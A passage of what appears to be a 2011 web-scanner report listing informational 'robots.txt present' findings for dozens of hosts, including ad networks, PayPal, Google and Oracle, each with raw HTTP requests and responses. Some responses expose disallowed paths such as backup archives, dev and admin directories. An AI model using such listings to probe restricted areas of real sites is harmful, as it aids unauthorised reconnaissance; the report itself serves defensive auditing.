http://www.readwriteweb.com/enterprise/2010/11/oracle.php
http://www.sapient.com/en-us/about-sapient/alliances/atg.html
http://www.shopify.com/
http://www.sophelle.com/
http://www.tenzing.com/atg-ecommerce-hosting.asp
http://www.volusion.com/
http://www.youtube.com/v/JWMKXb1Guq4
http://www.znode.com/znode-multifront/default.aspx
http://www2.znode.com/analytics

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

26.1. http://1215.ic-live.com/goat.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1215.ic-live.com
Path:	/goat.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1215.ic-live.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:48 GMT
Server: Apache
Last-Modified: Mon, 08 Aug 2011 18:08:46 GMT
ETag: "87845a-72f-4aa0256936780"
Accept-Ranges: bytes
Content-Length: 1839
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Cache: MISS from i2a-coll-6
X-Cache-Lookup: MISS from i2a-coll-6:80
Via: 1.0 i2a-coll-6:80 (squid/2.6.STABLE21)
Connection: close

...User-agent: *
Disallow: /allCountryCodes.txt
Disallow: /altidconv.php
Disallow: /backup/
Disallow: /bugs-dec16.tar
Disallow: /cgi-bin/
Disallow: /checktime.php
Disallow: /client-kit/
Disallow: /com
...[SNIP]...

26.2. http://4qinvite.4q.iperceptions.com/1.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://4qinvite.4q.iperceptions.com
Path:	/1.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 4qinvite.4q.iperceptions.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 16:08:50 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.3. http://904-kuw-942.mktoresp.com/webevents/visitWebPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://904-kuw-942.mktoresp.com
Path:	/webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 904-kuw-942.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "9021f4-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.4. http://a.tribalfusion.com/displayAd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/displayAd.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.5. http://ad.doubleclick.net/adj/nbcu.cnbc/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.6. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 15:32:13 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

26.7. http://adclick.g.doubleclick.net/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adclick.g.doubleclick.net
Path:	/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adclick.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:05:51 GMT
Server: AdClickServer
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.8. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:1ab5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Connection: close

User-agent: *
Disallow: /

26.9. http://adx.g.doubleclick.net/pagead/adview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.g.doubleclick.net
Path:	/pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:05:55 GMT
Expires: Wed, 07 Sep 2011 17:05:55 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.10. http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/jquery/1/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Tue, 06 Sep 2011 15:32:35 GMT
Expires: Tue, 06 Sep 2011 15:15:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=0
Age: 0

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.11. http://altfarm.mediaplex.com/ad/bk/17353-119518-3840-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/bk/17353-119518-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 15:37:49 GMT
Connection: keep-alive

User-agent: *
Disallow: /

26.12. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:31 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.13. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:11 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:32:11 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.14. http://assets1.csc.com/home/media/billboard195.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/home/media/billboard195.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: assets1.csc.com

Response

HTTP/1.0 200 OK
x-amz-id-2: PX8wfig8m2z77mZsQvH6itSiqgiuOU3XJq5NNYZ1CRAKkFEbyVKRS4OB5HCyy8cy
x-amz-request-id: 4D833E142B54D232
Date: Sat, 07 May 2011 03:24:45 GMT
x-amz-meta-s3fox-filesize: 588
x-amz-meta-s3fox-modifiedtime: 1270233164000
Last-Modified: Fri, 02 Apr 2010 18:33:10 GMT
ETag: "eae0a3837e8079ea9171c7fb85828c80"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 588
Server: AmazonS3
Age: 1702
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1f332349b33dea0d6b53ccc2e31130b69dae72ff3a008be443100d91012d6a73744f7992e198d693,3c912d84690db1ee55013161e45bab283a8b15669ac825b11726f9385b2fc60b9922ca60c0c64678
Via: 1.0 a1c5ac3682794e4a6d3935bd273efd27.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

User-agent: *
Disallow: /insidecsc/
Disallow: /npsweb/
Disallow: /dupont/
Disallow: /digital_strategy/
Disallow: /careersca_en/downloads/DavidJones556x312.flv
Disallow: /careersca_en/media/Citrix2.swf
...[SNIP]...

26.15. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Thu, 08 Sep 2011 15:37:51 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.16. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.17. http://blog.harbottle.com/dm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.harbottle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Oct 2009 10:32:22 GMT
ETag: "4b0981-54-477a9980"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /bd/wp-admin/
Disallow: /dm/wp-admin/
Allow: /bd
Allow: /dm

26.18. http://blogs.oracle.com/otn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.oracle.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/plain; charset=UTF-8
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214596302+0;age=10826;ecid=1131419376808517,0:1)
Content-Length: 393
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

User-agent: Ultraseek
Disallow:

User-agent: sunsearch-gsa-crawler
Disallow:

User-agent: Oracle Secure Enterprise Search
Disallow:

User-agent: *
Disallow: /images
Disallow: /roller-
Disallow: /them
...[SNIP]...

26.19. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bugzilla.mozilla.org

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs01
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 17:06:20 GMT
Keep-Alive: timeout=300, max=1000
Accept-Ranges: bytes
ETag: "10d-4a199cef3e040"
Connection: close
Last-Modified: Sat, 23 Apr 2011 18:04:41 GMT
Content-Length: 269

User-agent: Browsershots
Disallow:

User-agent: *
Disallow: /*.cgi
Disallow: /*show_bug.cgi*ctype=*
Allow: /
Allow: /*index.cgi
Allow: /*page.cgi
Allow: /*show_bug.cgi
Allow: /*describecomponents.cgi

...[SNIP]...

26.20. http://c.betrad.com/surly.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/surly.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:59:07 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

26.21. http://c.brightcove.com/services/viewer/federated_f9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/viewer/federated_f9

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.brightcove.com

Response

26.22. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.statcounter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Sep 2010 14:41:23 GMT
ETag: "28d92e6-1a-49166f495eac0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.23. http://cdn.gigya.com/JS/socialize.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/JS/socialize.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 14:56:31 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

26.24. http://cdn.krxd.net/config/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.krxd.net
Path:	/config/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.krxd.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:59:49 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
X-Request-Time: D=409 t=1315320914126717
X-Served-By: logger-b001.krxd.net
Date: Tue, 06 Sep 2011 14:56:50 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

26.25. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 26
X-Reuse-Index: 21
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

User-agent: *
Disallow: /

26.26. http://clickserve.dartsearch.net/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.dartsearch.net
Path:	/link/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clickserve.dartsearch.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:32:12 GMT
Expires: Tue, 06 Sep 2011 15:32:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:

26.27. http://clk.fetchback.com/serve/fb/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.28. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.29. https://cms.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cms.paypal.com
Path:	/us/cgi-bin/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cms.paypal.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 31 Mar 2010 21:55:38 GMT
Accept-Ranges: bytes
Content-Length: 374
Content-Type: text/plain; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscription
...[SNIP]...

26.30. http://cnbc.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cnbc.com
Path:	/crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 02 Jun 2011 21:22:02 GMT
Accept-Ranges: bytes
ETag: "079141d6b21cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: close
Date: Tue, 06 Sep 2011 14:57:44 GMT
Age: 1233
Content-Length: 157

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/msnbc/SitemapIndex.xml

26.31. http://content.links.channelintelligence.com/images/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.links.channelintelligence.com
Path:	/images/blank.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:2ff7"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Tue, 06 Sep 2011 16:45:40 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.32. http://convctr.overture.com/images/cc/cc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://convctr.overture.com
Path:	/images/cc/cc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Last-Modified: Wed, 09 Jul 2008 01:24:35 GMT
ETag: "491b5-1a-48741353"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.33. http://d.ads.readwriteweb.com/spcjs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.ads.readwriteweb.com
Path:	/spcjs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.ads.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "107454-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

26.34. http://d1.openx.org/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/ck.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "246a23-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

26.35. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:15:57 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.36. http://deloitte.12hna.com/preferences/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://deloitte.12hna.com
Path:	/preferences/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: deloitte.12hna.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:19 GMT
Server: Apache/1.3.26 (Unix) Debian GNU/Linux PHP/4.4.0-0.dotdeb.0 mod_ssl/2.8.9 OpenSSL/0.9.6c
Last-Modified: Mon, 15 Oct 2007 16:06:41 GMT
ETag: "c2c586-a15-47139011"
Accept-Ranges: bytes
Content-Length: 2581
Connection: close
Content-Type: text/plain; charset=iso-8859-1

# robots.txt for Dbriefs U supplemental material and Group Attendance pages

User-agent: *

Disallow: /dbriefs_u/Dbriefs_U_Supplemental_Material.pdf
Disallow: /dbriefs_u/dbriefsu_supplemental_material
...[SNIP]...

26.37. http://dev.mysql.com/common/js/s_code_remote.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dev.mysql.com
Path:	/common/js/s_code_remote.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dev.mysql.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:56 GMT
Server: Apache/2.2.19 (Fedora)
Last-Modified: Tue, 27 Oct 2009 04:18:32 GMT
Accept-Ranges: bytes
Content-Length: 302
Connection: close
Content-Type: text/plain; charset=UTF-8

# don't index bychapter version of documentation
User-Agent: *
Disallow: /documentation/mysql/bychapter/
# or the actual file download pages
Disallow: /get/
# And logins
Disallow: /login/

# Like a ba
...[SNIP]...

26.38. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
Last-Modified: Sat, 03 Sep 2011 01:08:38 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=292 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9999
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

26.39. https://docs.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:06:34 GMT
Expires: Tue, 06 Sep 2011 17:06:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

26.40. http://download.oracle.com/docs/html/E13982_01/wsassemble.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.oracle.com
Path:	/docs/html/E13982_01/wsassemble.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.oracle.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=21600
Content-Type: text/plain
Age: 4349
Date: Tue, 06 Sep 2011 15:54:59 GMT
Last-Modified: Tue, 06 Sep 2011 11:30:06 GMT
Expires: Tue, 06 Sep 2011 20:42:30 GMT
Content-Length: 368281
Connection: close

# http://download.oracle.com/robots.txt
# Generated: 2011-09-06T11:30Z
# Questions: Ted Gilchrist, Robert Crews
User-agent: *
Disallow: /otn/
Disallow: /docs/cds/
